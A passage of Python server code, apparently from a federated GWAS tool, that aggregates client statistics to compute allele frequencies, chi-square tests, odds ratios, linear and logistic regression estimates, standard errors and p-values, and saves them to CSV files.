""" Compute global non-missing sample count as well as allele counts and determine global minor allele """
try:
# compute global non-missing sample counts for the SNPs
non_missing_sample_counts = self.compute_aggregated_parameter(SplinkLocalParameter.NON_MISSING_SAMPLE_COUNT,
DataType.NUMPY_ARRAY_NON_NEGATIVE_INTEGER)
# compute global allele counts
allele_counts = self.compute_aggregated_parameter(SplinkLocalParameter.ALLELE_COUNT,
DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER)
# determine global minor/major allele for each SNP
minor_allele_names = np.argmin(allele_counts, axis=1)
major_allele_names = 1 - minor_allele_names
# get the minor/major allele count for each SNP
minor_allele_counts = np.min(allele_counts, axis=1)
major_allele_counts = np.max(allele_counts, axis=1)
# compute minor/major allele frequency for each SNP
allele_counts_total = np.sum(allele_counts, axis=1)
minor_allele_frequencies = minor_allele_counts / allele_counts_total
major_allele_frequencies = major_allele_counts / allele_counts_total
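# e.g., aggregated counts [30, 70] for a SNP give minor allele index 0, minor count 30,
# major count 70, and minor/major allele frequencies 30/100 = 0.3 and 70/100 = 0.7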
# store global non-missing sample count, minor/major allele names/counts/frequencies in the dictionaries;
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices.copy()):
snp_counter += 1
self.non_missing_sample_counts[snp_index] = non_missing_sample_counts[snp_counter]
self.allele_counts[snp_index] = allele_counts[snp_counter]
self.minor_allele_names[snp_index] = self.allele_names[snp_index][minor_allele_names[snp_counter]]
self.major_allele_names[snp_index] = self.allele_names[snp_index][major_allele_names[snp_counter]]
self.minor_allele_counts[snp_index] = minor_allele_counts[snp_counter]
self.major_allele_counts[snp_index] = major_allele_counts[snp_counter]
self.minor_allele_frequencies[snp_index] = minor_allele_frequencies[snp_counter]
self.major_allele_frequencies[snp_index] = major_allele_frequencies[snp_counter]
# share the global minor/major allele names
minor_allele_names_considered = dict()
major_allele_names_considered = dict()
for snp_index in self.considered_snp_indices:
minor_allele_names_considered[snp_index] = self.minor_allele_names[snp_index]
major_allele_names_considered[snp_index] = self.major_allele_names[snp_index]
self.global_parameters[SplinkGlobalParameter.MINOR_ALLELE_NAME] = minor_allele_names_considered
self.global_parameters[SplinkGlobalParameter.MAJOR_ALLELE_NAME] = major_allele_names_considered
# tell clients to go to minor-allele step
self.set_step(SplinkProjectStep.MINOR_ALLELE)
except Exception as non_missing_count_exception:
logger.error(f'Project {self.project_id}: {non_missing_count_exception}')
self.project_failed()
def minor_allele_step(self):
""" Determine the next step based on the algorithm name """
try:
if self.algorithm == SplinkAlgorithm.CHI_SQUARE:
# shared SNP indices (excluding ignored ones) for which contingency table should be computed in clients
self.global_parameters[SplinkGlobalParameter.SNP_INDEX] = self.considered_snp_indices
# tell clients to go to contingency-table step
self.set_step(SplinkProjectStep.CONTINGENCY_TABLE)
elif self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
# shared SNP indices (excluding ignored ones) for which XTX and XTY should be computed in clients
self.global_parameters[SplinkGlobalParameter.SNP_INDEX] = self.considered_snp_indices
# tell clients to go to Beta-Linear step
self.set_step(SplinkProjectStep.BETA_LINEAR)
elif self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION:
# initialize log_likelihood and beta values
self.considered_in_process_snp_indices = self.considered_snp_indices.intersection(self.in_process_snp_indices)
beta_values = dict() # beta values shared with clients
for snp_index in self.considered_in_process_snp_indices:
# 2 for snp and intercept columns
beta_values[snp_index] = np.array([0.0 for _ in range(0, len(self.covariates) + 2)])
self.beta_values[snp_index] = beta_values[snp_index]
self.log_likelihood_values[snp_index] = None
# share initial beta values (excluding ignored SNPs) for which gradient, Hessian, and log likelihood
# should be computed in clients
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
self.global_parameters[SplinkGlobalParameter.CURRENT_BETA_ITERATION] = self.current_beta_iteration
# tell clients to go to beta-logistic step
self.set_step(SplinkProjectStep.BETA_LOGISTIC)
except Exception as minor_allele_exception:
logger.error(f'Project {self.project_id}: {minor_allele_exception}')
self.project_failed()
def contingency_table_step(self):
""" Compute global chi-square, odd ratio, and p-values using the aggregated contingency tables """
try:
contingency_tables = self.compute_aggregated_parameter(SplinkLocalParameter.CONTINGENCY_TABLE,
DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER)
# convert global contingency table from list to dictionary
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices):
snp_counter += 1
self.contingency_tables[snp_index] = contingency_tables[snp_counter]
# compute the results (i.e. MAF, chi-square, odds ratio, and p-values) for the chunk
self.compute_results_chi_square()
# add chromosome number, base pair distance, and p-value of the current chunk to results for all chunks
self.append_to_results_all_chunks()
# save the results using a separate process
save_process = multiprocessing.Process(target=self.save_results_chi_square)
save_process.daemon = True
save_process.start()
save_process.join()
save_process.terminate()
# empty the dictionaries to release the memory because they are not needed anymore
self.init_algorithm_attributes()
# if this is not the last chunk, set up the next chunk of SNPs
if not self.is_last_chunk():
self.setup_next_chunk()
else:
# if this is the last chunk, generate the manhattan plot first, and then, tell clients to download the results
self.manhattan_plot()
self.set_step(HyFedProjectStep.RESULT)
except Exception as contingency_table_exception:
logger.error(f'Project {self.project_id}: {contingency_table_exception}')
self.project_failed()
# ##### linear regression beta-step related functions
def beta_linear_step(self):
""" Compute linear regression global beta values using the aggregated XTX and XTY matrices for the chunk """
try:
# aggregate X'X matrices and X'Y vectors from the clients
xt_x_matrices = self.compute_aggregated_parameter(SplinkLocalParameter.XT_X_MATRIX,
DataType.LIST_NUMPY_ARRAY_FLOAT)
xt_y_vectors = self.compute_aggregated_parameter(SplinkLocalParameter.XT_Y_VECTOR,
DataType.LIST_NUMPY_ARRAY_FLOAT)
# convert lists to dictionaries
self.xt_x_matrices = dict()
self.xt_y_vectors = dict()
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices.copy()):
snp_counter += 1
self.xt_x_matrices[snp_index] = xt_x_matrices[snp_counter]
self.xt_y_vectors[snp_index] = xt_y_vectors[snp_counter]
# initialize beta values and xt_x_inverse_matrices as empty dictionaries
self.beta_values = dict()
self.xt_x_inverse_matrices = dict()
# queues
queue_beta = multiprocessing.Queue()
queue_xt_x_inverse = multiprocessing.Queue()
# threads to read from the queue
beta_read_thread = threading.Thread(target=self.read_queue_beta_linear, args=(queue_beta,))
beta_read_thread.daemon = True
beta_read_thread.start()
xt_x_inverse_read_thread = threading.Thread(target=self.read_queue_xt_x_inverse, args=(queue_xt_x_inverse,))
xt_x_inverse_read_thread.daemon = True
xt_x_inverse_read_thread.start()
# processes to compute the beta values and xt_x_inverse matrices for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_beta_linear_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_beta, queue_xt_x_inverse,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read threads to be done
beta_read_thread.join()
xt_x_inverse_read_thread.join()
# close queues
queue_beta.close()
queue_xt_x_inverse.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# update considered index set
for snp_index in self.considered_snp_indices.copy(): # iterate over a copy because indices may be discarded below
if self.beta_values[snp_index][0] == "NA":
self.considered_snp_indices.discard(snp_index)
self.std_error_values[snp_index] = self.beta_values[snp_index]
self.t_stat_values[snp_index] = self.beta_values[snp_index]
self.p_values[snp_index] = self.beta_values[snp_index]
continue
# only share beta values for considered SNPs with clients to compute sum square error values
beta_values = {snp_index: self.beta_values[snp_index] for snp_index in self.considered_snp_indices}
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
# tell clients to go to std-error step
self.set_step(SplinkProjectStep.STD_ERROR_LINEAR)
except Exception as beta_linear_exception:
logger.error(f'Project {self.project_id}: {beta_linear_exception}')
self.project_failed()
def calculate_beta_linear_sub_chunk(self, start_index, end_index, queue_beta, queue_xt_x_inverse):
""" Compute linear regression beta values for a sub-chunk """
beta_values = dict()
xt_x_inverse_matrices = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_beta.put(beta_values)
queue_xt_x_inverse.put(xt_x_inverse_matrices)
beta_values = dict()
xt_x_inverse_matrices = dict()
if np.linalg.det(self.xt_x_matrices[snp_index]) == 0:
beta_values[snp_index] = np.array(["NA" for _ in range(len(self.covariates) + 2)]) # use the local dict so the "NA" marker reaches the parent process via the queue
continue
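# with the aggregated cross-products, the federated estimate follows the usual normal
# equations, beta_hat = (X'X)^{-1} X'Y, and is equivalent to a pooled OLS fit on the combined data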
xt_x_inverse_matrices[snp_index] = np.linalg.inv(self.xt_x_matrices[snp_index])
beta_values[snp_index] = np.dot(xt_x_inverse_matrices[snp_index], self.xt_y_vectors[snp_index]).flatten()
queue_beta.put(beta_values)
queue_xt_x_inverse.put(xt_x_inverse_matrices)
def read_queue_xt_x_inverse(self, queue_xt_x_inverse):
while len(self.xt_x_inverse_matrices) < len(self.considered_snp_indices):
xt_x_inverse = queue_xt_x_inverse.get()
self.xt_x_inverse_matrices.update(xt_x_inverse)
def read_queue_beta_linear(self, queue_beta_linear):
while len(self.beta_values) < len(self.considered_snp_indices):
betas = queue_beta_linear.get()
self.beta_values.update(betas)
# ##### linear regression std-error step related functions
def std_error_linear_step(self):
""" Compute linear regression standard error values using the aggregated SSE values """
try:
# aggregate SSE values from the clients
sse_values = self.compute_aggregated_parameter(SplinkLocalParameter.SSE, DataType.NUMPY_ARRAY_FLOAT)
# convert sse list to dictionary
self.sse_values = dict()
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices):
snp_counter += 1
self.sse_values[snp_index] = sse_values[snp_counter]
# initialize std_error_values as an empty dictionary
self.std_error_values = dict()
# queue
queue_std_error = multiprocessing.Queue()
# thread to read from the queue
std_error_read_thread = threading.Thread(target=self.read_queue_std_error, args=(queue_std_error,))
std_error_read_thread.daemon = True
std_error_read_thread.start()
# processes to compute the std error values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_std_error_linear_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_std_error,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
std_error_read_thread.join()
# close queues
queue_std_error.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# compute results (i.e. t-stats and p-values) for the chunk
self.compute_results_regression()
# add chromosome number, base pair distance, and p-value of the current chunk to results for all chunks
self.append_to_results_all_chunks()
# save results
save_process = multiprocessing.Process(target=self.save_results_regression)
save_process.daemon = True
save_process.start()
save_process.join()
save_process.terminate()
# empty the dictionaries to release the memory because they are not needed anymore
self.init_algorithm_attributes()
# if this is not the last chunk, set up the next chunk of SNPs
if not self.is_last_chunk():
self.setup_next_chunk()
else:
# if this is the last chunk, generate the manhattan plot first, and then, tell clients to download the results
self.manhattan_plot()
self.set_step(HyFedProjectStep.RESULT)
except Exception as std_error_linear_exception:
logger.error(f'Project {self.project_id}: {std_error_linear_exception}')
self.project_failed()
def calculate_std_error_linear_sub_chunk(self, start_index, end_index, queue_std_error):
""" Compute linear regression std error values for a sub-chunk """
std_error_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_std_error.put(std_error_values)
std_error_values = dict()
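# standard OLS error model: sigma^2_hat = SSE / (n - p) with p = len(covariates) + 2
# (intercept + SNP + covariates); SE(beta_j) = sqrt(sigma^2_hat * [(X'X)^{-1}]_jj)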
sigma_squared = self.sse_values[snp_index] / (self.non_missing_sample_counts[snp_index] - len(self.covariates) - 2)
variance_values = (sigma_squared * self.xt_x_inverse_matrices[snp_index]).diagonal()
std_error_values[snp_index] = np.sqrt(variance_values)
queue_std_error.put(std_error_values)
# used in std-error step of linear/logistic regression
def read_queue_std_error(self, queue_std_error):
while len(self.std_error_values) < len(self.considered_snp_indices):
std_error = queue_std_error.get()
self.std_error_values.update(std_error)
# ##### logistic regression beta step related functions
def beta_logistic_step(self):
""" Compute logistic regression global beta values using the aggregated gradient and Hessian matrices for the chunk """
try:
# aggregate gradient, Hessian, and log likelihood values from the clients
gradient_vectors = self.compute_aggregated_parameter(SplinkLocalParameter.GRADIENT, DataType.LIST_NUMPY_ARRAY_FLOAT)
hessian_matrices = self.compute_aggregated_parameter(SplinkLocalParameter.HESSIAN, DataType.LIST_NUMPY_ARRAY_FLOAT)
log_likelihood_values = self.compute_aggregated_parameter(SplinkLocalParameter.LOG_LIKELIHOOD, DataType.NUMPY_ARRAY_FLOAT)
# convert lists to dictionaries
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.new_log_likelihood_values = dict()
snp_counter = -1
for snp_index in sorted(self.considered_in_process_snp_indices):
snp_counter += 1
self.gradient_vectors[snp_index] = gradient_vectors[snp_counter]
self.hessian_matrices[snp_index] = hessian_matrices[snp_counter]
self.new_log_likelihood_values[snp_index] = log_likelihood_values[snp_counter]
# initialize new beta values as an empty dictionary
self.new_beta_values = dict()
# queue
queue_beta_values = multiprocessing.Queue()
# thread to read from the queue
beta_value_read_thread = threading.Thread(target=self.read_queue_beta_logistic, args=(queue_beta_values,))
beta_value_read_thread.daemon = True
beta_value_read_thread.start()
# processes to compute the new beta values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_beta_logistic_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_beta_values,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
beta_value_read_thread.join()
# close queues
queue_beta_values.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# update beta values
for snp_index in self.new_beta_values.keys():
self.beta_values[snp_index] = self.new_beta_values[snp_index]
# update considered index set
for snp_index in self.considered_in_process_snp_indices:
if self.beta_values[snp_index][0] == "NA":
self.considered_snp_indices.discard(snp_index)
self.std_error_values[snp_index] = self.beta_values[snp_index]
self.t_stat_values[snp_index] = self.beta_values[snp_index]
self.p_values[snp_index] = self.beta_values[snp_index]
continue
# check whether beta values for the SNP converged. If so, remove the SNP index from the in_process indices
for snp_index in self.considered_in_process_snp_indices:
old_log_likelihood = self.log_likelihood_values[snp_index]
new_log_likelihood = self.new_log_likelihood_values[snp_index]
if self.has_converged(old_log_likelihood, new_log_likelihood):
self.in_process_snp_indices.discard(snp_index)
# update log likelihood values
for snp_index in self.new_log_likelihood_values.keys():
self.log_likelihood_values[snp_index] = self.new_log_likelihood_values[snp_index]
# if there are SNPs whose beta values have not converged yet and the maximum number of iterations has not been reached,
# share the updated global beta values (excluding ignored or converged SNPs) with the clients and stay in the beta_logistic step
self.considered_in_process_snp_indices = self.considered_snp_indices.intersection(self.in_process_snp_indices)
if self.current_beta_iteration != self.max_iterations and len(self.considered_in_process_snp_indices) != 0:
self.current_beta_iteration += 1
beta_values = {snp_index: self.beta_values[snp_index] for snp_index in self.considered_in_process_snp_indices}
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
self.global_parameters[SplinkGlobalParameter.CURRENT_BETA_ITERATION] = self.current_beta_iteration
logger.debug(f'Project {self.project_id}: Beta iteration # {self.current_beta_iteration} done!')
# if beta max iterations reached or all beta values converged, share updated beta values (excluding ignored SNPs)
# with clients and go to the std_error_logistic step
else:
beta_values = {snp_index: self.beta_values[snp_index] for snp_index in self.considered_snp_indices}
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
self.set_step(SplinkProjectStep.STD_ERROR_LOGISTIC)
except Exception as beta_logistic_exception:
logger.error(f'Project {self.project_id}: {beta_logistic_exception}')
self.project_failed()
def calculate_beta_logistic_sub_chunk(self, start_index, end_index, queue_beta_values):
""" Compute logistic regression beta values for a sub-chunk """
new_beta_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_in_process_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_beta_values.put(new_beta_values)
new_beta_values = dict()
if np.linalg.det(self.hessian_matrices[snp_index]) == 0:
new_beta_values[snp_index] = np.array(["NA" for _ in range(len(self.covariates) + 2)])
continue
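# Newton-Raphson update with the aggregated gradient g and Hessian H:
# beta_new = beta_old + H^{-1} g (the sign convention is assumed to match the
# client-side gradient/Hessian computation)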
hessian_inverse_matrix = np.linalg.inv(self.hessian_matrices[snp_index])
beta_update_vector = np.dot(hessian_inverse_matrix, self.gradient_vectors[snp_index])
new_beta_vector = self.beta_values[snp_index].reshape(-1, 1) + beta_update_vector
new_beta_values[snp_index] = new_beta_vector.flatten()
queue_beta_values.put(new_beta_values)
def read_queue_beta_logistic(self, queue_beta_values):
while len(self.new_beta_values) < len(self.considered_in_process_snp_indices):
new_betas = queue_beta_values.get()
self.new_beta_values.update(new_betas)
# ##### logistic regression std-error step related functions
def std_error_logistic_step(self):
""" Compute logistic regression standard error values using the aggregated Hessian matrices for the chunk """
try:
# aggregate Hessian matrices from the clients
hessian_matrices = self.compute_aggregated_parameter(SplinkLocalParameter.HESSIAN, DataType.LIST_NUMPY_ARRAY_FLOAT)
# convert list to dictionary
self.hessian_matrices = dict()
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices):
snp_counter += 1
self.hessian_matrices[snp_index] = hessian_matrices[snp_counter]
# initialize std_error_values as an empty dictionary
self.std_error_values = dict()
# queue
queue_std_error = multiprocessing.Queue()
# thread to read from the queue
std_error_read_thread = threading.Thread(target=self.read_queue_std_error, args=(queue_std_error,))
std_error_read_thread.daemon = True
std_error_read_thread.start()
# processes to compute the std error values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_std_error_logistic_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_std_error,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
std_error_read_thread.join()
# close queues
queue_std_error.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# update the considered index set (ignore SNPs with a singular Hessian)
for snp_index in self.considered_snp_indices.copy(): # iterate over a copy because indices may be discarded below
if self.std_error_values[snp_index][0] == "NA":
self.considered_snp_indices.discard(snp_index)
self.t_stat_values[snp_index] = self.std_error_values[snp_index]
self.p_values[snp_index] = self.std_error_values[snp_index]
continue
# compute the results (i.e. t-stats and p-values) for the chunk
self.compute_results_regression()
# add chromosome number, base pair distance, and p-value of the current chunk to results for all chunks
self.append_to_results_all_chunks()
# save results
save_process = multiprocessing.Process(target=self.save_results_regression)
save_process.daemon = True
save_process.start()
save_process.join()
save_process.terminate()
# empty the dictionaries to release the memory because they are not needed anymore
self.init_algorithm_attributes()
# if this is not the last chunk, set up the next chunk of SNPs
if not self.is_last_chunk():
self.setup_next_chunk()
else:
# if this is the last chunk, generate the manhattan plot first, and then, tell clients to download the results
self.manhattan_plot()
self.set_step(HyFedProjectStep.RESULT)
except Exception as std_error_logistic_exception:
logger.error(f'Project {self.project_id}: {std_error_logistic_exception}')
self.project_failed()
def calculate_std_error_logistic_sub_chunk(self, start_index, end_index, queue_std_error):
""" Compute logistic regression std error values for a sub-chunk """
std_error_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_std_error.put(std_error_values)
std_error_values = dict()
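# standard errors are taken from the diagonal of the inverted aggregated Hessian
# (assumed to act as the observed information matrix): SE(beta_j) = sqrt([H^{-1}]_jj)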
if np.linalg.det(self.hessian_matrices[snp_index]) == 0:
std_error_values[snp_index] = np.array(["NA" for _ in range(len(self.covariates) + 2)])
continue
std_error_values[snp_index] = np.sqrt(np.linalg.inv(self.hessian_matrices[snp_index]).diagonal())
queue_std_error.put(std_error_values)
# ############### functions related to all algorithms
def init_algorithm_attributes(self):
""" Set the chi-square or linear/logistic regression algorithm related dictionaries to empty """
self.non_missing_sample_counts = dict()
self.allele_counts = dict()
self.minor_allele_names = dict()
self.major_allele_names = dict()
self.minor_allele_counts = dict()
self.major_allele_counts = dict()
self.minor_allele_frequencies = dict()
self.major_allele_frequencies = dict()
self.contingency_tables = dict()
self.maf_case = dict()
self.maf_control = dict()
self.chi_square_values = dict()
self.odd_ratio_values = dict()
self.xt_x_matrices = dict()
self.xt_y_vectors = dict()
self.xt_x_inverse_matrices = dict()
self.sse_values = dict()
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.new_log_likelihood_values = dict()
self.new_beta_values = dict()
self.log_likelihood_values = dict()
self.beta_values = dict()
self.std_error_values = dict()
self.t_stat_values = dict()
self.p_values = dict()
def compute_p_values(self):
""" Compute p-values for a chunk with multi-processing """
try:
queue_p_values = multiprocessing.Queue()
# thread to read from the queue
p_value_read_thread = threading.Thread(target=self.read_queue_p_values, args=(queue_p_values,))
p_value_read_thread.daemon = True
p_value_read_thread.start()
# processes to compute the p-values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_p_values_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_p_values,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
p_value_read_thread.join()
# close queues
queue_p_values.close()
# terminate the processes
for proc in process_list:
proc.terminate()
logger.info(f"Project {self.project_id}: p-value computation is done for chunk # {self.current_chunk}!")
except Exception as p_value_exception:
logger.error(f'Project {self.project_id}: {p_value_exception}')
self.project_failed()
def calculate_p_values_sub_chunk(self, start_index, end_index, queue_p_values):
""" Compute p-values for a sub-chunk """
p_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_p_values.put(p_values)
p_values = dict()
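# chi-square test: p = P(X > chi_square) with X ~ chi2(1);
# linear regression: two-sided t-test with df = n - len(covariates) - 2;
# logistic regression: Wald test, where t_stat^2 ~ chi2(1) under the null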
if self.algorithm == SplinkAlgorithm.CHI_SQUARE:
p_values[snp_index] = 1 - stats.chi2.cdf(self.chi_square_values[snp_index], 1)
elif self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
degree_of_freedom = self.non_missing_sample_counts[snp_index] - len(self.covariates) - 2
p_values[snp_index] = 2 * (1 - stats.t.cdf(np.abs(self.t_stat_values[snp_index]), degree_of_freedom))
elif self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION:
p_values[snp_index] = 1 - stats.chi2.cdf(np.square(np.array(self.t_stat_values[snp_index])), 1)
queue_p_values.put(p_values)
def read_queue_p_values(self, queue_p_values):
while len(self.p_values) < len(self.considered_snp_indices):
prob_values = queue_p_values.get()
self.p_values.update(prob_values)
# ##### Chi-square result computation/saving functions
def compute_maf(self):
""" Compute minor allele frequency of case/control for the chunk """
try:
for snp_index in self.considered_snp_indices:
minor_case = self.contingency_tables[snp_index][0]
major_case = self.contingency_tables[snp_index][1]
minor_control = self.contingency_tables[snp_index][2]
major_control = self.contingency_tables[snp_index][3]
self.maf_case[snp_index] = minor_case / (minor_case + major_case)
self.maf_control[snp_index] = minor_control / (minor_control + major_control)
logger.info(f'Project {self.project_id}: case/control minor allele frequency computation is done for chunk # {self.current_chunk}!')
except Exception as maf_exception:
logger.error(f'Project {self.project_id}: {maf_exception}')
self.project_failed()
def compute_chi_square_values(self):
""" Compute chi-square value for the chunk """
try:
for snp_index in self.considered_snp_indices:
# observed allele counts
observed_allele_counts = self.contingency_tables[snp_index]
# expected allele counts
expected_allele_counts = np.zeros(4)
case_count = self.contingency_tables[snp_index][0] + self.contingency_tables[snp_index][1]
control_count = self.contingency_tables[snp_index][2] + self.contingency_tables[snp_index][3]
minor_count = self.contingency_tables[snp_index][0] + self.contingency_tables[snp_index][2]
major_count = self.contingency_tables[snp_index][1] + self.contingency_tables[snp_index][3]
total_count = case_count + control_count
expected_allele_counts[0] = (case_count * minor_count) / total_count
expected_allele_counts[1] = (case_count * major_count) / total_count
expected_allele_counts[2] = (control_count * minor_count) / total_count
expected_allele_counts[3] = (control_count * major_count) / total_count
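# e.g., for an observed table [30, 70, 20, 80]: case = 100, control = 100, minor = 50,
# major = 150, total = 200, so the expected counts are [25, 75, 25, 75] and
# chi-square = (30-25)^2/25 + (70-75)^2/75 + (20-25)^2/25 + (80-75)^2/75 ≈ 2.67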
# compute chi-square value
chi_square = np.sum(np.square(observed_allele_counts - expected_allele_counts) / expected_allele_counts)
self.chi_square_values[snp_index] = chi_square
logger.info(f"Project {self.project_id}: chi-square computation is done for chunk # {self.current_chunk}!")
except Exception as chi_square_exception:
logger.error(f'Project {self.project_id}: {chi_square_exception}')
self.project_failed()
def compute_odd_ratio_values(self):
""" Compute odd ratio value for the chunk """
try:
for snp_index in self.considered_snp_indices:
minor_case = self.contingency_tables[snp_index][0]
major_case = self.contingency_tables[snp_index][1]
minor_control = self.contingency_tables[snp_index][2]
major_control = self.contingency_tables[snp_index][3]
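# odds ratio = (minor_case * major_control) / (major_case * minor_control);
# e.g., for the table [30, 70, 20, 80]: (30 * 80) / (70 * 20) = 2400 / 1400 ≈ 1.71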
if (major_case * minor_control) != 0:
self.odd_ratio_values[snp_index] = (minor_case * major_control) / (major_case * minor_control)
else:
self.odd_ratio_values[snp_index] = "NA"
logger.info(f"Project {self.project_id}: odd-ratio computation is done for chunk # {self.current_chunk}!")
except Exception as odd_ratio_exception:
logger.error(f'Project {self.project_id}: {odd_ratio_exception}')
self.project_failed()
def compute_results_chi_square(self):
""" Compute MAF for case/control, chi-square, odd-ratio, and p-values for chi-square algorithm """
try:
self.compute_maf()
self.compute_chi_square_values()
self.compute_odd_ratio_values()
self.compute_p_values()
except Exception as result_computation_error:
logger.error(f"Chi-square result computation error: {result_computation_error}")
self.project_failed()
def save_results_chi_square(self):
""" Save chi-square algorithm results for the chunk into the file """
try:
logger.info(f'Project {self.project_id}: Started saving results for chunk # {self.current_chunk}!')
# create result directory/file if they do not already exist
result_dir = self.create_result_dir()
result_file = open(f'{result_dir}/chi-square-result.csv', 'a')
# write the result file header in the first chunk
if self.current_chunk == 1:
result_file.write('CHR,SNP,BP,A1,F_A,F_U,A2,CHISQ,P,OR')
for snp_index in np.arange(self.chunk_start_index, self.chunk_end_index):
snp_id = self.snp_id_values[snp_index].decode('utf-8')
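# snp_id is assumed to be the tab-separated string 'chromosome<TAB>snp_name<TAB>base_pair_position'
# prepared on the client side, matching the CHR/SNP/BP columns written below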
chromosome_number, snp_name, base_pair_distance = snp_id.split('\t')
minor_allele = self.minor_allele_names[snp_index]
major_allele = self.major_allele_names[snp_index]
maf_case = round_result(self.maf_case[snp_index])
maf_control = round_result(self.maf_control[snp_index])
chi_square = round_result(self.chi_square_values[snp_index])
p_value = round_result(self.p_values[snp_index])
odd_ratio = round_result(self.odd_ratio_values[snp_index])
csv_row = f'{chromosome_number},{snp_name},{base_pair_distance},{minor_allele},{maf_case},' \
f'{maf_control},{major_allele},{chi_square},{p_value},{odd_ratio}'
result_file.write("\n" + str(csv_row))
result_file.close()
logger.info(f'Project {self.project_id}: Saving results done for chunk # {self.current_chunk}!')
except Exception as save_exception:
logger.error(f'Project {self.project_id}: {save_exception}')
self.project_failed()
# ###### Linear/logistic regression result computation/saving functions
def compute_t_stat_values(self):
""" Compute T statistics for the chunk """
try:
for snp_index in self.considered_snp_indices:
self.t_stat_values[snp_index] = self.beta_values[snp_index] / self.std_error_values[snp_index]
logger.info(f'Project {self.project_id}: T statistics computation done for chunk # {self.current_chunk}!')
except Exception as t_stats_exception:
logger.error(f'Project {self.project_id}: {t_stats_exception}')
self.project_failed()
def compute_results_regression(self):
""" Compute t-stat and p-values for the linear/logistic regression algorithm """
try:
self.compute_t_stat_values()
self.compute_p_values()
except Exception as result_computation_error:
logger.error(f"Regression result computation error: {result_computation_error}")
self.project_failed()
def save_results_regression(self):
""" Save the linear/logistic regression results for the chunk into the file """
try:
# create result directory/file if they do not already exist
result_dir = self.create_result_dir()
if self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
result_file = open(f'{result_dir}/linear-regression-result.csv', 'a')
else:
result_file = open(f'{result_dir}/logistic-regression-result.csv', 'a')
# write the result file header in the first chunk
if self.current_chunk == 1:
result_file.write('CHR,SNP,BP,A1,TEST,NMISS,BETA,STAT,P')
for snp_index in np.arange(self.chunk_start_index, self.chunk_end_index):
snp_id = self.snp_id_values[snp_index].decode('utf-8')
chromosome_number, snp_name, base_pair_distance = snp_id.split('\t')
beta_counter = 1
minor_allele = self.minor_allele_names[snp_index]
feature_name = 'ADD'
non_missing_samples = round_result(self.non_missing_sample_counts[snp_index])
beta_value = round_result(self.beta_values[snp_index][beta_counter])
t_stat_value = round_result(self.t_stat_values[snp_index][beta_counter])
p_value = round_result(self.p_values[snp_index][beta_counter])
csv_row = f'{chromosome_number},{snp_name},{base_pair_distance},' \
f'{minor_allele},{feature_name},{non_missing_samples},' \
f'{beta_value},{t_stat_value},{p_value}'
result_file.write("\n" + str(csv_row))
for covariate in self.covariates:
beta_counter += 1
beta_value = round_result(self.beta_values[snp_index][beta_counter])
